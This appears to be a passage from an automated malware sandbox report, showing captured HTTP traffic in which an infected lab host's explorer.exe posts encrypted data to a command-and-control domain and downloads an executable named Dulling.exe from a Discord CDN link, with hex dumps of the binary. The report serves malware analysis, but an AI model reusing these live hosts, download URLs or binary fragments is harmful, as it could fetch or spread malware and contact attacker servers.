20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	49883	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:49:03.205075026 CET	22334	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gcjoh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: host-data-coin-11.com
Jan 9, 2022 18:49:03.205094099 CET	22334	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 81 66 5d 02 c8 a1 c1 64 13 c5 bf 68 Data Ascii: i;G~CE5i[nwmFu$f]dhKpvjCE'Rs\ Y9w+bB/\JO`p%Z(f0}>y,K8u/91QF7c(o#y~UP8mdquax8[X
Jan 9, 2022 18:49:03.764148951 CET	22422	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:49:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49749	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:40.248591900 CET	1064	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://veuiviue.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: host-data-coin-11.com
Jan 9, 2022 18:47:40.248615980 CET	1065	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 31 cd c0 16 Data Ascii: i;G~CE5i[nwmFu$f]d1,!;9^<B@Asg@x'0O3zOOm,[ocT;3.W/-)dCAxfvhG
Jan 9, 2022 18:47:40.792582989 CET	1065	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49750	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:41.007575035 CET	1066	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dmryaqnk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 171 Host: host-data-coin-11.com
Jan 9, 2022 18:47:41.007608891 CET	1066	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 38 db 8a 02 Data Ascii: i;G~CE5i[nwmFu$f]d8-`1dCeLC<1Ms$Kb&xwMvXt_MC5;G<>U6833+WR~%w
Jan 9, 2022 18:47:41.570221901 CET	1067	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49751	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:41.771090031 CET	1067	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mckoice.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: host-data-coin-11.com
Jan 9, 2022 18:47:41.771151066 CET	1068	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 3e 82 a0 2f Data Ascii: i;G~CE5i[nwmFu$f]d>/t#.^M/=z#rWJg@V ?P\|#CA7WRk3 n6lUPZjSNiY)0[1v2oC@9nw
Jan 9, 2022 18:47:42.320991993 CET	1068	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49771	185.233.81.115	443	C:\Windows\explorer.exe

Timestamp	Direction	Data
2022-01-09 17:47:52 UTC	OUT	GET /32739433.dat?iddqd=1 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.233.81.115
2022-01-09 17:47:52 UTC	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:52 GMT Content-Type: text/html Content-Length: 153 Connection: close
2022-01-09 17:47:52 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49816	162.159.130.233	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-09 17:48:12 UTC	0	OUT	GET /attachments/928021103304134716/928938539171864596/Dulling.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
2022-01-09 17:48:12 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 09 Jan 2022 17:48:12 GMT Content-Type: application/x-msdos-program Content-Length: 537600 Connection: close CF-Ray: 6caf7ec14c974e56-FRA Accept-Ranges: bytes Age: 199063 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Dulling.exe ETag: "9c40df5e45e0c3095f7b920664a902d3" Expires: Mon, 09 Jan 2023 17:48:12 GMT Last-Modified: Fri, 07 Jan 2022 09:10:06 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1641546606627429 x-goog-hash: crc32c=dl8hyA== x-goog-hash: md5=nEDfXkXgwwlfe5IGZKkC0w== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 537600 X-GUploader-UploadID: ADPycdtlCliSYyQl1KSSgmwVOYctSGWCgxkyC1rVylR_c639Vu2oY_AV_5rRHTlZ_4c_0od8IunW4UCFXNBUwFFuOQs X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2022-01-09 17:48:12 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 57 43 67 79 61 74 76 48 6f 68 63 73 6d 6b 36 65 53 50 76 6f 68 74 58 56 4e 71 68 42 75 64 31 51 75 73 47 64 47 77 78 67 4e 33 75 49 59 7a 56 35 30 34 61 4f 4a 4f 67 49 41 64 45 78 4f 64 6a 33 66 6e 4c 72 32 62 65 34 61 71 64 6b 32 25 32 46 67 6f 54 4f 46 45 50 53 37 25 32 42 6f 25 32 46 6e 79 6b 79 32 70 79 6b 47 74 42 67 72 74 30 4e 76 39 65 51 77 42 67 6d 4b 67 56 61 43 63 71 5a 57 6a 6f 49 47 70 42 61 4d 67 6f 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WCgyatvHohcsmk6eSPvohtXVNqhBud1QusGdGwxgN3uIYzV504aOJOgIAdExOdj3fnLr2be4aqdk2%2FgoTOFEPS7%2Bo%2Fnyky2pykGtBgrt0Nv9eQwBgmKgVaCcqZWjoIGpBaMgoQ%3D%3D"}],"group":"cf-nel","max_age":
2022-01-09 17:48:12 UTC	2	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 f3 c2 bd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2c 08 00 00 06 00 00 00 00 00 00 1e 4a 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(0,J `@ @
2022-01-09 17:48:12 UTC	3	IN	Data Raw: 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 92 28 a9 00 00 06 38 0f 00 00 00 72 2f 0a 00 70 80 19 00 00 04 38 0a 00 00 00 28 5d 01 00 06 38 e7 ff ff ff 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 Data Ascii: *((8r/p8(]8*******((0((((((((((
2022-01-09 17:48:12 UTC	4	IN	Data Raw: 28 92 00 00 06 12 04 11 05 11 06 09 1f 0b 1f 16 1f 0c 06 28 92 00 00 06 12 03 11 04 11 05 11 06 1f 0c 1d 1f 0d 06 28 92 00 00 06 12 06 09 11 04 11 05 1f 0d 1f 0c 1f 0e 06 28 92 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 11 1f 0f 06 28 92 00 00 06 12 04 11 05 11 06 09 1f 0f 1f 16 1f 10 06 28 92 00 00 06 12 03 11 04 11 05 11 06 17 1b 1f 11 06 28 93 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f 18 06 28 93 00 00 06 12 03 11 04 11 05 11 06 Data Ascii: ((((((((((((((
2022-01-09 17:48:12 UTC	6	IN	Data Raw: 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 13 07 16 13 08 38 77 01 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 91 1f 18 62 03 11 07 18 58 91 1f 10 62 60 03 11 07 17 58 91 1e 62 60 03 11 07 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04 11 08 07 17 59 40 50 00 00 00 06 16 3e 49 00 Data Ascii: [>X8w]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?8.XXbXb`Xb``%(XY@P>I
2022-01-09 17:48:12 UTC	7	IN	Data Raw: 76 c2 00 00 fe 0c 26 00 5a fe 0c 27 00 59 fe 0e 26 00 fe 0c 26 00 fe 0c 26 00 fe 0c 26 00 59 61 fe 0e 2b 00 fe 0c 28 00 fe 0c 28 00 1f 19 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 29 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1d 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2a 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1f 0d 64 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11 06 3f c9 ff ff ff 38 4d 00 00 00 11 09 11 0a Data Ascii: v&Z'Y&&&&Ya+((ba(()X(((ba((*X(((da((+X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX?8M
2022-01-09 17:48:12 UTC	8	IN	Data Raw: 09 7b 72 00 00 04 8e 69 54 0e 04 09 7b 72 00 00 04 8e 69 1f 40 7f 4e 00 00 04 28 b0 00 00 06 26 16 2a 06 28 65 00 00 0a 18 5a 11 04 28 6b 00 00 0a 06 28 65 00 00 0a 19 5a 09 7b 72 00 00 04 8e 69 28 6c 00 00 0a 16 13 05 05 20 7d 1d ea 0c 40 0a 00 00 00 7e 6f 00 00 04 39 19 00 00 00 7e 6d 00 00 04 02 03 04 05 0e 04 0e 05 6f 2f 01 00 06 13 05 38 06 00 00 00 17 80 6f 00 00 04 11 05 2a 7e 6d 00 00 04 02 03 04 05 0e 04 0e 05 6f 2f 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 06 0c 00 70 18 8d 25 00 00 01 25 16 d0 13 00 00 01 28 23 00 00 0a a2 25 17 d0 25 00 00 01 Data Ascii: {riT{ri@N(&(eZ(k(eZ{ri(l }@~o9~mo/8o~mo/*0(&*0SQ(#rp%%(#%%
2022-01-09 17:48:12 UTC	10	IN	Data Raw: 0b 47 00 00 44 39 00 00 6e 11 00 00 71 17 00 00 6b 02 00 00 87 50 00 00 e6 51 00 00 b9 39 00 00 24 04 00 00 15 48 00 00 79 3b 00 00 54 22 00 00 6c 29 00 00 7a 18 00 00 a1 39 00 00 1e 1a 00 00 86 57 00 00 a2 22 00 00 1a 3d 00 00 59 37 00 00 35 57 00 00 1b 43 00 00 fb 3c 00 00 1f 11 00 00 95 13 00 00 cb 51 00 00 5d 53 00 00 97 0e 00 00 0c 1a 00 00 d5 47 00 00 be 4d 00 00 77 01 00 00 57 31 00 00 a1 20 00 00 f3 28 00 00 ef 27 00 00 25 39 00 00 5e 3e 00 00 c0 2d 00 00 3c 0f 00 00 a5 1b 00 00 33 43 00 00 11 3a 00 00 d5 54 00 00 58 1b 00 00 4b 20 00 00 48 21 00 00 db 3e 00 00 98 0f 00 00 08 12 00 00 40 1e 00 00 fc 1c 00 00 45 12 00 00 78 58 00 00 37 2f 00 00 b9 1a 00 00 f0 0b 00 00 4a 15 00 00 cb 10 00 00 46 1c 00 00 55 3c 00 00 dc 44 00 00 5b 18 00 00 14 3c 00 Data Ascii: GD9nqkPQ9$Hy;T"l)z9W"=Y75WC<Q]SGMwW1 ('%9^>-<3C:TXK H!>@ExX7/JFU<D[<
2022-01-09 17:48:12 UTC	11	IN	Data Raw: 00 00 00 80 00 00 00 e5 3d 00 00 44 52 00 00 18 26 00 00 b2 56 00 00 1c 59 00 00 3f 28 00 00 4b 54 00 00 fd 43 00 00 b1 31 00 00 b9 0c 00 00 b7 08 00 00 49 3e 00 00 d4 26 00 00 d8 3a 00 00 a4 0c 00 00 e1 2b 00 00 c4 09 00 00 3d 3c 00 00 bc 53 00 00 4c 0c 00 00 8f 22 00 00 bb 10 00 00 c7 0d 00 00 ef 1d 00 00 4d 04 00 00 07 54 00 00 14 2f 00 00 e7 38 00 00 f7 58 00 00 30 4f 00 00 30 23 00 00 54 09 00 00 6e 42 00 00 0c 3f 00 00 4b 42 00 00 60 1f 00 00 c0 20 00 00 86 54 00 00 d2 59 00 00 d1 4e 00 00 bc 3b 00 00 03 41 00 00 b2 2f 00 00 c4 44 00 00 53 39 00 00 cb 22 00 00 9f 36 00 00 fa 26 00 00 a2 3b 00 00 89 41 00 00 53 19 00 00 32 15 00 00 de 28 00 00 cf 3f 00 00 23 23 00 00 90 07 00 00 81 14 00 00 c1 1e 00 00 8c 42 00 00 68 21 00 00 c5 02 00 00 af 2c 00 00 Data Ascii: =DR&VY?(KTC1I>&:+=<SL"MT/8X0O0#TnB?KB` TYN;A/DS9"6&;AS2(?##Bh!,
2022-01-09 17:48:12 UTC	12	IN	Data Raw: 20 59 00 00 00 fe 0e 5a 00 38 2b f1 ff ff 38 91 04 00 00 20 46 02 00 00 38 20 f1 ff ff 00 11 02 28 d7 00 00 06 28 d8 00 00 06 13 0d 20 01 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 41 00 45 02 00 00 00 26 02 00 00 05 00 00 00 38 21 02 00 00 00 38 d4 00 00 00 20 01 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 67 00 45 0a 00 00 00 62 00 00 00 71 00 00 00 ce 00 00 00 14 00 00 00 31 00 00 00 89 00 00 00 af 00 00 00 05 00 00 00 31 01 00 00 f7 00 00 00 38 5d 00 00 00 38 7f 00 00 00 20 04 00 00 00 38 bf ff ff ff 11 49 28 da 00 00 06 11 20 28 dc 00 00 06 3a 0a 00 00 00 20 07 00 00 00 38 a2 ff ff ff 11 25 11 49 28 d0 00 00 06 13 30 12 30 28 6f 00 00 0a 3f 86 00 00 00 20 05 00 00 00 28 1e 01 00 06 Data Ascii: YZ8+8 F8 (( (:& 8AE&8!8 (:& 8gEbq118]8 8I( (: 8%I(00(o? (
2022-01-09 17:48:12 UTC	14	IN	Data Raw: e0 eb ff ff 11 1d 11 04 18 58 11 21 18 91 9c 20 1d 00 00 00 38 cb eb ff ff 11 4a 28 0a 01 00 06 6a 13 0c 20 04 01 00 00 38 b7 eb ff ff 20 6e 00 00 00 20 4a 00 00 00 58 fe 0e 3b 00 20 b9 00 00 00 38 9e eb ff ff fe 0c 16 00 20 0d 00 00 00 fe 0c 3b 00 9c 20 f6 00 00 00 38 86 eb ff ff 20 66 00 00 00 20 51 00 00 00 58 fe 0e 5f 00 20 06 02 00 00 38 6d eb ff ff 1f 1e 8d 16 00 00 01 25 d0 0a 01 00 04 28 1b 01 00 06 13 2b 20 11 00 00 00 38 4f eb ff ff 12 30 28 6f 00 00 0a 80 68 00 00 04 20 18 00 00 00 38 39 eb ff ff fe 0c 76 00 20 06 00 00 00 20 b6 00 00 00 20 3c 00 00 00 59 9c 20 1b 02 00 00 38 1a eb ff ff 38 be 1c 00 00 20 f2 00 00 00 38 0b eb ff ff 11 5d 1a 1e 12 3f 28 b0 00 00 06 26 20 83 